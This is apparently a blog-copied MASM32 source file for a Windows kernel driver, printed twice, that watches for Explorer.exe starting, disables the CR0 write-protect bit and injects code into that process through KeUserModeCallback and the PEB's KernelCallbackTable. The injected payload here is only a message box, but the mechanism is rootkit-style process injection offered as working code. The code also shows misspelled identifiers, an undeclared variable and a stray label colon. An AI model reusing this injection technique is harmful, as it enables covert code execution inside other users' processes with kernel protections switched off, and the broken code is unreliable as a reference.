386
.model flat, stdcall
option casemap:none
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
include //masm32//include//w2k//ntstatus.inc
include //masm32//include//w2k//ntddk.inc
include //masm32//include//w2k//ntoskrnl.inc
includelib //masm32//lib//w2k//ntoskrnl.lib
include //masm32//Macros//Strings.mac
include useful.asm
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; R E A D O N L Y D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.const
CCOUNTED_UNICODE_STRING "////Device////ring3code", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "////DosDevices////ring3code", g_usSymbolicLinkName, 4
Target db "Explorer.exe",0
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; U N I N I T I A L I Z E D D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.data?
g_dwImageFileNameOffset DWORD ?
g_fbNotifyRoutineSet BOOL ?
szProcessName CHAR IMAGE_FILE_PATH_LEN dup(?)
notAttack BOOL ?
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Myproc !!@!! I Just Code For Fan~~~ MayBe Error~~~
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
myproc:
;please using Api Reloc before Call apiz
;even then u could restore kernel32.dll imagebase to ur code in ring0 bcz i got peb for u ~
;i was just coding something here to test my code can go to ring3~
;if it was call in ring0 it would crash down the system ~ but in ring3 all it would make a msgbox or
; an error for u to know code runs under ring3~
invoke MessageBox, hDlg, $CTA0("Sure want to exit?"), $CTA0("Exit Confirmation"), MB_YESNO + MB_ICONQUESTION + MB_DEFBUTTON1
retn
length_myproc =$ - myproc
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DisableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DisableWriteProtect proc
Local uAttr:Dword
push eax
mov eax, cr0;
mov uAttr, eax;
and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
mov cr0, eax;
pop eax
mov eax,uAttr
ret
DisableWriteProtect Endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EnableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
EnableWriteProtect proc uOldAttr:dword
push eax;
mov eax, uOldAttr
mov cr0, eax;
pop eax;
ret 04h
EnableWriteProtect endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov ecx, pIrp
mov (_IRP PTR [ecx]).IoStatus.Status, STATUS_SUCCESS
and (_IRP PTR [ecx]).IoStatus.Information, 0
fastcall IofCompleteRequest, ecx, IO_NO_INCREMENT
mov eax, STATUS_SUCCESS
ret
DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetUserPEB
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; out: eax - *peb
GetUserPEB proc near
assume fs:nothing
push ebx
mov ebx, dword ptr fs:[124h]
mov eax, dword ptr [ebx+134h] ; gimme KTRAP_FRAME
; no ktrap_frame if called from kernel mode
; (from non user mode thread)
test eax, eax
jz GetUserPEB_End
mov eax, dword ptr [ebx+44h]
mov eax, dword ptr [eax+1b0h] ; peb for non user mode threadz null too
test eax, eax
GetUserPEB_end:
pop ebx
retn
GetUserPEB endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CallToUserMode
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
CallToUserMode proc lpPeb:PVOID, dwAddr:DWORD, dwSize:DWORD
local kernel_callback_tableb:dword
local ecx_on_return:dword
local edx_on_return:dword
local base_address:dword
; mov ecx_on_retrun,ecx
; mov edx_on_retrun,edx
mov eax,lpPEB
mov eax, dword ptr [eax+2ch] ; *KernelCallbackTable
mov kernel_callback_table, eax
and base_address, 0
push PAGE_READWRITE
push MEM_COMMIT or MEM_TOP_DOWN or MEM_RESERVE
lea eax, allocation_size
mov allocation_size, (dwSize+1024)
push eax
lea eax, base_address
push 0
push eax
push -1
call NtAllocateVirtualMemory
test eax, eax
jnz CallToUserMode_End
mov edx, base_address
mov edi, edx
push edi
push esi
mov esi, dwAddr; copy the to user-mode
push dwSize
pop ecx
rep movsb
pop esi
pop edi
mov eax, kernel_callback_table
;mov edx, base_address
sub edx, eax
shr edx, 2
lea ecx,ecx_on_return
push ecx
lea eax, edx_on_return
push eax
push 0
lea eax, edx_on_return
push eax
;stack start
;where to start code user mode
push edx
call KeUserModeCallBack
CallToUserMode_Free_Mem:
push MEM_DECOMMIT
mov eax, allocation_size
push eax
mov eax, base_address
push eax
push -1
call NtFreeVirtualMemory
CallToUserMode_End:
leave
ret
CallToUserMode endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; AttackProcess
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
AttackProcess proc pEpr:PVOID
local oldArr:DWORD
invoke KeAttachProcess,pEpr
.if eax == STATUS_SUCCESS
invoke DisableWriteProtect
mov oldArr,eax
invoke GetUserPEB
jz Attack_End_err:
invoke CallToUserMode, eax, addr myproc, length_myproc
invoke EnableWriteProcect,oldArr
invoke KeDetachProcess
.endif
Attack_End: mov eax, STATUS_SUCCESS
Attack_End_err: ret
AttackProcess endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NotifyRoutine
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
NotifyRoutine proc dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL ; BOOLEAN
local peProcess:PVOID ; PEPROCESS
local fbDereference:BOOL
local us:UNICODE_STRING
local as:ANSI_STRING
push eax ; reserve DWORD on stack
invoke PsLookupProcessByProcessId, dwParentId, esp
pop peProcess ; -> EPROCESS
.if eax == STATUS_SUCCESS
mov fbDereference, TRUE ; PsLookupProcessByProcessId references process object
.else
invoke PsLookupProcessByProcessId, dwProcessId, esp
pop peProcess ; -> EPROCESS
.if eax == STATUS_SUCCESS
mov fbDereference, TRUE
.else
ret
.endif
.endif
mov eax, bCreate
invoke GetImageFilePath, peProcess, addr us
.if eax == STATUS_SUCCESS
lea eax, szProcessName
mov as.Buffer, eax
mov as.MaximumLength, IMAGE_FILE_PATH_LEN
and as._Length, 0
invoke RtlUnicodeStringToAnsiString, addr as, addr us, FALSE
invoke ExFreePool, us.Buffer
lea eax, szProcessName
invoke __strcmpi, eax, addr Target
.if eax
.if notAttacked
invoke AttackProcess,peProcess
.if eax == STATUS_SUCCESS
mov notAttack,FALSE
.endif
.endif
.endif
.endif
.if fbDereference
fastcall ObfDereferenceObject, peProcess
.endif
ret
NotifyRoutine endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchControl proc uses esi edi pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov esi, pIrp
assume esi:ptr _IRP
; Initialize to failure.
mov [esi].IoStatus.Status, STATUS_UNSUCCESSFUL
and [esi].IoStatus.Information, 0
IoGetCurrentIrpStackLocation esi
mov edi, eax
assume edi:ptr IO_STACK_LOCATION
mov [esi].IoStatus.Status, STATUS_INVALID_DEVICE_REQUEST
; After IoCompleteRequest returns, the IRP pointer
; is no longer valid and cannot safely be dereferenced.
push [esi].IoStatus.Status
assume edi:nothing
assume esi:nothing
fastcall IofCompleteRequest, esi, IO_NO_INCREMENT
pop eax ; [esi].IoStatus.Status
ret
DispatchControl endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverUnload proc pDriverObject:PDRIVER_OBJECT
invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, TRUE
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax, pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
ret
DriverUnload endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; D I S C A R D A B L E C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetImageFileNameOffset
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetImageFileNameOffset proc uses esi ebx
; Finds EPROCESS.ImageFileName field offset
; W2K EPROCESS.ImageFileName = 01FCh
; WXP EPROCESS.ImageFileName = 0174h
; WNET EPROCESS.ImageFileName = 0154h
; Instead of hardcoding above offsets we just scan
; the EPROCESS structure of System process one page down.
; It/'s well-known trick.
invoke IoGetCurrentProcess
mov esi, eax
xor ebx, ebx
.while ebx < 1000h ; one page more than enough.
; Case insensitive compare.
lea eax, [esi+ebx]
invoke _strnicmp, eax, $CTA0("system"), 6
.break .if eax == 0
inc ebx
.endw
.if eax == 0
; Found.
mov eax, ebx
.else
; Not found.
xor eax, eax
.endif
ret
GetImageFileNameOffset endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, addr pDeviceObject
.if eax == STATUS_SUCCESS
invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)], offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)], offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
mov notAttack,FALSE
and g_fbNotifyRoutineSet, FALSE
invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, FALSE
invoke GetImageFileNameOffset
mov g_dwImageFileNameOffset, eax ; it can be not found and equal to 0, btw
mov status, STATUS_SUCCESS
.else
invoke IoDeleteDevice, pDeviceObject
.endif
.endif
mov eax, status
ret
DriverEntry endp
.model flat, stdcall
option casemap:none
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
include //masm32//include//w2k//ntstatus.inc
include //masm32//include//w2k//ntddk.inc
include //masm32//include//w2k//ntoskrnl.inc
includelib //masm32//lib//w2k//ntoskrnl.lib
include //masm32//Macros//Strings.mac
include useful.asm
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; R E A D O N L Y D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.const
CCOUNTED_UNICODE_STRING "////Device////ring3code", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "////DosDevices////ring3code", g_usSymbolicLinkName, 4
Target db "Explorer.exe",0
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; U N I N I T I A L I Z E D D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.data?
g_dwImageFileNameOffset DWORD ?
g_fbNotifyRoutineSet BOOL ?
szProcessName CHAR IMAGE_FILE_PATH_LEN dup(?)
notAttack BOOL ?
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Myproc !!@!! I Just Code For Fan~~~ MayBe Error~~~
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
myproc:
;please using Api Reloc before Call apiz
;even then u could restore kernel32.dll imagebase to ur code in ring0 bcz i got peb for u ~
;i was just coding something here to test my code can go to ring3~
;if it was call in ring0 it would crash down the system ~ but in ring3 all it would make a msgbox or
; an error for u to know code runs under ring3~
invoke MessageBox, hDlg, $CTA0("Sure want to exit?"), $CTA0("Exit Confirmation"), MB_YESNO + MB_ICONQUESTION + MB_DEFBUTTON1
retn
length_myproc =$ - myproc
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DisableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DisableWriteProtect proc
Local uAttr:Dword
push eax
mov eax, cr0;
mov uAttr, eax;
and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
mov cr0, eax;
pop eax
mov eax,uAttr
ret
DisableWriteProtect Endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EnableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
EnableWriteProtect proc uOldAttr:dword
push eax;
mov eax, uOldAttr
mov cr0, eax;
pop eax;
ret 04h
EnableWriteProtect endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov ecx, pIrp
mov (_IRP PTR [ecx]).IoStatus.Status, STATUS_SUCCESS
and (_IRP PTR [ecx]).IoStatus.Information, 0
fastcall IofCompleteRequest, ecx, IO_NO_INCREMENT
mov eax, STATUS_SUCCESS
ret
DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetUserPEB
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; out: eax - *peb
GetUserPEB proc near
assume fs:nothing
push ebx
mov ebx, dword ptr fs:[124h]
mov eax, dword ptr [ebx+134h] ; gimme KTRAP_FRAME
; no ktrap_frame if called from kernel mode
; (from non user mode thread)
test eax, eax
jz GetUserPEB_End
mov eax, dword ptr [ebx+44h]
mov eax, dword ptr [eax+1b0h] ; peb for non user mode threadz null too
test eax, eax
GetUserPEB_end:
pop ebx
retn
GetUserPEB endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CallToUserMode
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
CallToUserMode proc lpPeb:PVOID, dwAddr:DWORD, dwSize:DWORD
local kernel_callback_tableb:dword
local ecx_on_return:dword
local edx_on_return:dword
local base_address:dword
; mov ecx_on_retrun,ecx
; mov edx_on_retrun,edx
mov eax,lpPEB
mov eax, dword ptr [eax+2ch] ; *KernelCallbackTable
mov kernel_callback_table, eax
and base_address, 0
push PAGE_READWRITE
push MEM_COMMIT or MEM_TOP_DOWN or MEM_RESERVE
lea eax, allocation_size
mov allocation_size, (dwSize+1024)
push eax
lea eax, base_address
push 0
push eax
push -1
call NtAllocateVirtualMemory
test eax, eax
jnz CallToUserMode_End
mov edx, base_address
mov edi, edx
push edi
push esi
mov esi, dwAddr; copy the to user-mode
push dwSize
pop ecx
rep movsb
pop esi
pop edi
mov eax, kernel_callback_table
;mov edx, base_address
sub edx, eax
shr edx, 2
lea ecx,ecx_on_return
push ecx
lea eax, edx_on_return
push eax
push 0
lea eax, edx_on_return
push eax
;stack start
;where to start code user mode
push edx
call KeUserModeCallBack
CallToUserMode_Free_Mem:
push MEM_DECOMMIT
mov eax, allocation_size
push eax
mov eax, base_address
push eax
push -1
call NtFreeVirtualMemory
CallToUserMode_End:
leave
ret
CallToUserMode endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; AttackProcess
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
AttackProcess proc pEpr:PVOID
local oldArr:DWORD
invoke KeAttachProcess,pEpr
.if eax == STATUS_SUCCESS
invoke DisableWriteProtect
mov oldArr,eax
invoke GetUserPEB
jz Attack_End_err:
invoke CallToUserMode, eax, addr myproc, length_myproc
invoke EnableWriteProcect,oldArr
invoke KeDetachProcess
.endif
Attack_End: mov eax, STATUS_SUCCESS
Attack_End_err: ret
AttackProcess endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NotifyRoutine
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
NotifyRoutine proc dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL ; BOOLEAN
local peProcess:PVOID ; PEPROCESS
local fbDereference:BOOL
local us:UNICODE_STRING
local as:ANSI_STRING
push eax ; reserve DWORD on stack
invoke PsLookupProcessByProcessId, dwParentId, esp
pop peProcess ; -> EPROCESS
.if eax == STATUS_SUCCESS
mov fbDereference, TRUE ; PsLookupProcessByProcessId references process object
.else
invoke PsLookupProcessByProcessId, dwProcessId, esp
pop peProcess ; -> EPROCESS
.if eax == STATUS_SUCCESS
mov fbDereference, TRUE
.else
ret
.endif
.endif
mov eax, bCreate
invoke GetImageFilePath, peProcess, addr us
.if eax == STATUS_SUCCESS
lea eax, szProcessName
mov as.Buffer, eax
mov as.MaximumLength, IMAGE_FILE_PATH_LEN
and as._Length, 0
invoke RtlUnicodeStringToAnsiString, addr as, addr us, FALSE
invoke ExFreePool, us.Buffer
lea eax, szProcessName
invoke __strcmpi, eax, addr Target
.if eax
.if notAttacked
invoke AttackProcess,peProcess
.if eax == STATUS_SUCCESS
mov notAttack,FALSE
.endif
.endif
.endif
.endif
.if fbDereference
fastcall ObfDereferenceObject, peProcess
.endif
ret
NotifyRoutine endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchControl proc uses esi edi pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov esi, pIrp
assume esi:ptr _IRP
; Initialize to failure.
mov [esi].IoStatus.Status, STATUS_UNSUCCESSFUL
and [esi].IoStatus.Information, 0
IoGetCurrentIrpStackLocation esi
mov edi, eax
assume edi:ptr IO_STACK_LOCATION
mov [esi].IoStatus.Status, STATUS_INVALID_DEVICE_REQUEST
; After IoCompleteRequest returns, the IRP pointer
; is no longer valid and cannot safely be dereferenced.
push [esi].IoStatus.Status
assume edi:nothing
assume esi:nothing
fastcall IofCompleteRequest, esi, IO_NO_INCREMENT
pop eax ; [esi].IoStatus.Status
ret
DispatchControl endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverUnload proc pDriverObject:PDRIVER_OBJECT
invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, TRUE
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax, pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
ret
DriverUnload endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; D I S C A R D A B L E C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetImageFileNameOffset
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetImageFileNameOffset proc uses esi ebx
; Finds EPROCESS.ImageFileName field offset
; W2K EPROCESS.ImageFileName = 01FCh
; WXP EPROCESS.ImageFileName = 0174h
; WNET EPROCESS.ImageFileName = 0154h
; Instead of hardcoding above offsets we just scan
; the EPROCESS structure of System process one page down.
; It/'s well-known trick.
invoke IoGetCurrentProcess
mov esi, eax
xor ebx, ebx
.while ebx < 1000h ; one page more than enough.
; Case insensitive compare.
lea eax, [esi+ebx]
invoke _strnicmp, eax, $CTA0("system"), 6
.break .if eax == 0
inc ebx
.endw
.if eax == 0
; Found.
mov eax, ebx
.else
; Not found.
xor eax, eax
.endif
ret
GetImageFileNameOffset endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, addr pDeviceObject
.if eax == STATUS_SUCCESS
invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)], offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)], offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
mov notAttack,FALSE
and g_fbNotifyRoutineSet, FALSE
invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, FALSE
invoke GetImageFileNameOffset
mov g_dwImageFileNameOffset, eax ; it can be not found and equal to 0, btw
mov status, STATUS_SUCCESS
.else
invoke IoDeleteDevice, pDeviceObject
.endif
.endif
mov eax, status
ret
DriverEntry endp
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
